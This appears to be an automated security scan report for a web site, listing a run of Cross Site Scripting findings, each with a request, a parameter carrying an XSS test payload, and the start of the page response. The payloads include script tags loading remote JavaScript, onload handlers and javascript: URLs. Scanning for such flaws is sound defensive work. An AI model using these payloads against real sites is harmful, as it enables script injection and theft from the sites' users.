<!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #243\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT/XSS SRC=\"http://soapui.org/xss.js\"></SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #244\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #245Scan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT/SRC=\"http://soapui.org/xss.js\"></SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #246\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <<SCRIPT>alert(\"XSS\");//<</SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #247\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT SRC=http://soapui.org/xss.js?<B\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #248\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT SRC=//ha.ckers.org/.j\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #249\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=\"javascript:alert('XSS')\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #250\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <iframe src=http://soapui.org/scriptlet.html\n<\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #251\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #252\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \\\";alert('XSS');//\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79Issue Number #253\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #254\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #255\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <BODY BACKGROUND=\"javascript:alert('XSS')\"\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #256\nScan Cross Site Scripting\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <BODY ONLOAD=alert('XSS')>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 